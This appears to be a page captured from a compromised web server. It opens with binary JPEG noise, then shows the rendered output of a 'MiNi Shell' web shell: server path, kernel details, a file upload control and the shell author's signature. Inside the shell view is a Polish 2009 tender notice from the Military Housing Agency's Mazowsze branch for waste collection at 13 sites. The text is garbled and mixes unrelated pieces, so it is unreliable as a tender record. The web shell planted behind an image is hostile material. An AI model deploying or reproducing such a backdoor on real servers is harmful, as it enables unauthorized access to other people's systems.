JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090525/79677-N-2009.html

<p class="kh_header"><b>Warszawa: Usługa - wywóz nieczystości stałych oraz tzw. nieczystości gabarytowych z zasobów Wojskowej Agencji Mieszkaniowej  Oddział Regionalny Mazowsze w Warszawie</b><br>
<b>Numer ogłoszenia: 79677 - 2009; data zamieszczenia: 25.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Oddział Regionalny "Mazowsze" Wojskowej Agencji Mieszkaniowej , ul. Chełmżyńska 1, 04-247 Warszawa, woj. mazowieckie, tel. 022 3261101, faks 022 812 0439.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wam.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa - wywóz nieczystości stałych oraz tzw. nieczystości gabarytowych z zasobów Wojskowej Agencji Mieszkaniowej  Oddział Regionalny Mazowsze w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	odbiór i wywóz do miejsc przeznaczenia (miejsc utylizacji, składowania, powtórnego
wykorzystania)    wszelkich    odpadów    komunalnych    pochodzących    z    lokali
mieszkalnych     i     lokali     użytkowych     stanowiących     zasób     Zamawiającego,
gromadzonych w osłonach/altanach śmietnikowych, wokół osłon/altan oraz w innych
miejscach i pomieszczeniach wskazanych przez Zamawiającego;
2)	odbiór i wywóz do miejsc przeznaczenia (miejsc utylizacji, składowania, powtórnego
wykorzystania)  wszelkich odpadów wielkogabarytowych pochodzących  z lokali
stanowiących     zasób     Zamawiającego,     gromadzonych     w     osłonach/altanach
śmietnikowych,  wokół osłon/altan oraz w innych miejscach i pomieszczeniach
wskazanych przez Zamawiającego, każdorazowo na osobne zlecenie (fax, tel.);
3)	odbiór i wywozu odpadów pochodzących z selektywnej zbiórki i segregacji odpadów,
jeśli zaistnieje taka potrzeba;
4)	nieodpłatne wyposażenie i dostarczenie na posesje kontenerów i pojemników wraz
z pokrywami do gromadzenia odpadów stałych;
5)	nieodpłatne   dostarczenie   na  posesje   lub   wskazane   miejsca   w  jej   otoczeniu,
pojemników do selektywnej zbiórki i segregacji odpadów (papier, szkło, plastik);
6)	odstawienie opróżnionych pojemników i kontenerów na miejsce ich lokalizacji;
7)	uprzątnięcie odpadów luzem, które wysypały się podczas ładowania lub w wyniku
opóźnionego wywozu czy przepełnienia pojemnika lub kontenera;
8)	wymianę na własny koszt zniszczonego pojemnika lub kontenera;
9)	utrzymanie   czystości   zewnętrznej   pojemników,   kontenerów   oraz   sprawności
technicznej zamknięć (klap zamykających);
10)	mycie i dezynfekcję pojemników i kontenerów.
4.	Wykonawca jest zobowiązany do złożenia odpadów powstałych w trakcie realizacji przedmiotu zamówienia w miejscu prawnie dopuszczonym do odzysku, składowania lub unieszkodliwiania odpadów lub też przekazania odpadów do odzysku osobom wskazanym w Rozporządzeniu Ministra Środowiska z dnia 21 kwietnia 2006 r. w sprawie listy rodzajów odpadów, które posiadacz odpadów może przekazywać osobom fizycznym lub jednostkom organizacyjnym niebędącym przedsiębiorcami, oraz dopuszczalnych metod ich odzysku (Dz. U. z 2006 r. Nr 75, poz. 527 z późn. zm.).
5.	Przedmiot zamówienia podzielony jest na 13 części ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Wykonawcą ubiegającym się o udzielenie zamówienia publicznego może być osoba
fizyczna, osoba prawna albo jednostka organizacyjna nieposiadająca osobowości
prawnej, która złoży ofertę.
2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy Pzp oraz spełniający poniższe warunki: 

1) Status prawny
Wykonawca musi wykazać, że posiada aktualne  (na  czas  realizacji zamówienia) zezwolenia na prowadzenie działalności w zakresie odbierania i transportu odpadów określonych przedmiotem zamówienia od właścicieli nieruchomości wydane przez właściwy organ na podstawie art.7 ust. 1 ustawy o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2005 r. Nr 236 poz. 2008 z późn. zm.),

2) Potencjał ekonomiczno - finansowy
Wykonawca musi wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności - na kwotę nie mniejszą niż 50 000 zł. (pięćdziesiąt tysięcy złotych)
	
3) Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:
Na potwierdzenie spełnienia wyżej wymienionych warunków Wykonawca dołączy do oferty oświadczenia i dokumenty wymienione w rozdziale IV SIWZ. Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Status prawny - wymagane dokumenty:

1)	aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)	dokument potwierdzający, że Wykonawca posiada wymagane przepisami prawa
zezwolenie   potwierdzające   jego   uprawnienia   do   prowadzenia   działalności
w zakresie odbierania i transportu odpadów.
3)	oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1 Prawa zamówień publicznych, stanowiące załącznik nr 3 do SIWZ. W przypadku Wykonawców występujących wspólnie, oświadczenie musi być podpisane przez wszystkich Wykonawców ubiegających się o udzielenie zamówienia lub ustanowionego pełnomocnika,   
4)	polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
5)	pełnomocnictwo w przypadku złożenia oferty przez pełnomocnika oraz pełnomocnictwo 
z art. 23 Pzp.
3. 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych Rozdz. VI ust. 1 pkt 1 składa dokument lub dokumenty, wystawione zgodnie z prawem kraju pochodzenia, określone w §2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 24 maja 2006 r. Nr 87 poz. 605).
4. Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
5. 	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.
6. 	Zamawiający wezwie wykonawców, którzy w określonym terminie nie złożyli oświadczeń lub dokumentów, lub którzy nie złożyli pełnomocnictw, albo złożyli dokumenty zawierające błędy, lub wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wam.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Chełmżyńska 1
04-247 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2009 godzina 10:00, miejsce: Wojskowa Agencja Mieszkaniowa Oddział Regionalny Mazowsze w Warszawie
ul. Chełmżyńska 1, 04-247 Warszawa
Kancelaria - pokój nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZEGRZE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
         Ulica - Nr budynku	        Ilość osób	
1	Radziwiłłowska - internat	81.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> JANÓWEK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
          Ulica - Nr budynku	Ilość osób 
1	Nowodworska 3	43	
2	Nowodworska 5	60	
3	Nowodworska 7	83	
Razem	186.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> NASIELSK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
      Ulica - Nr budynku	          Ilość osób
1	Starzyńskiego 7	            46.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> NOWY DWÓR MAZOWIECKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
        Ulica - Nr budynku	      Ilość osób
1	Sportowa 76 - internat	68
2	Sportowa 76 - hotel	5
3	Warszawska 35	            178
Razem	251.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PRUSZKÓW.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
        Ulica - Nr budynku	          Ilość osób
1	Al. Wojska Polskiego 40	233.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PRZASNYSZ.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
              Ulica - Nr budynku	Ilość osób
1	Makowska 1 - internat	65
2	Makowska 1 - hotel	3
Razem	68.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MIŃSK MAZOWIECKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
             Ulica - Nr budynku	                         Ilość osób
1	Warszawska 250/104	               24
2	Warszawska 250/104 - internat	  40
3	Warszawska 250/105	             100
4	Warszawska 250/106	             160
5	Okrzei 18F	                             5
6	Śniadeckich 5	                          171
7	Sobieskiego 85	                          120
8	Sobieskiego 85 - internat	               21
Razem	642.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> SIEDLCE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
           Ulica - Nr budynku	           Ilość osób
1	Dreszera 22 - internat	18.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> SULEJÓWEK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
          Ulica - Nr budynku	                    Ilość osób
1	Pl. Czarnieckiego 3 - internat	82.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> SOCHACZEW.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
            Ulica - Nr budynku	         Ilość osób
1	Lotników 1 - internat	45
2	Lotników 1 - hotel 	               8
Razem	53.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> KOMOROWO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
              Ulica - Nr budynku	Ilość osób
1	Cegielniana 54	              21
2	Legionowa 10	              69
Razem	90.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> BIAŁYSTOK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
             Ulica - Nr budynku	           Ilość osób
1	Kawaleryjska 10/50	          43
2	Kawaleryjska 70/57	          45
3	Kawaleryjska 70/59	          27
4	Kawaleryjska 70/59 - internat         15
5	Kawaleryjska 70/59 - hotel	            5
Razem	135.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> SUWAŁKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Adres
             Ulica - Nr budynku	          Ilość osób
1	Pułaskiego 24H - internat	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com